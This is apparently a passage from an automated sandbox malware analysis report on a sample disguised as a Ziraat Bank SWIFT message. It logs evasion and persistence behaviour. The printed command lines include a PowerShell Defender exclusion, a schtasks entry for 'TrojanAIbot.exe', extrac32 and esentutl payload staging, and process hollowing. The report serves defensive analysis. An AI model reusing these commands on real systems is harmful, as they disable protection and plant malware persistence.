                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96959Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96836Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96710Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96602Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96492Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96381Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99438Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99316Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99129Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98922Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98797Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98685Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98576Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97977Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97874Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97761Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97635Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97528Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97416Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97304Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97192Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97066Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96917Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96324Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96189Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96061Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95931Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99825
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99696
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99584
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99460
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99346
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99224
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99099
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98974
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98849
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98724
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98599
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98409
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98233
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98076
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97974
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97849
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97724
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97599
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97474
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97349
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97224
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97099
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96974
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96849
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96724
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96599
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96474
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99824
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99536
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99860
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99745
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99633
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99513
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99401
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99292
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99171
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99057
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98945
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98762
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98485
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98370
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98260
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98111
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97995
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97886
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97775
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97667
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97558
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97448
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97339
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97229
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97083
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96964
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96855
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96745
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96636
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96526
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96400
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99855
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99749
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99421
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99312
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99177
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99062
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98836
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98734
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98625
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98515
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98406
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98296
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98187
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98078
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97859
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97749
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97487
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: Wisrysxl.PIF, 00000018.00000002.2304345998.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                      Source: lxsyrsiW.pif, 00000019.00000003.2307653207.000000001B2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                      Source: x.exe, 00000004.00000002.2176035692.00000000008C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@4
                      Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                      Source: x.exe, 00000004.00000002.2176035692.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001C.00000002.2385410910.0000000000868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-38021
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02B2F744
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B2894C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 10_1_004015D7 SetUnhandledExceptionFilter,10_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 10_1_004015D7 SetUnhandledExceptionFilter,10_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 25_1_004015D7 SetUnhandledExceptionFilter,25_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 25_1_004015D7 SetUnhandledExceptionFilter,25_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 239008Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 364008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2B4008
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B15ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B1A7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B15BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B1A810
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_029E5ACC
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_029E5BD7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetLocaleInfoA,28_2_029EA810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
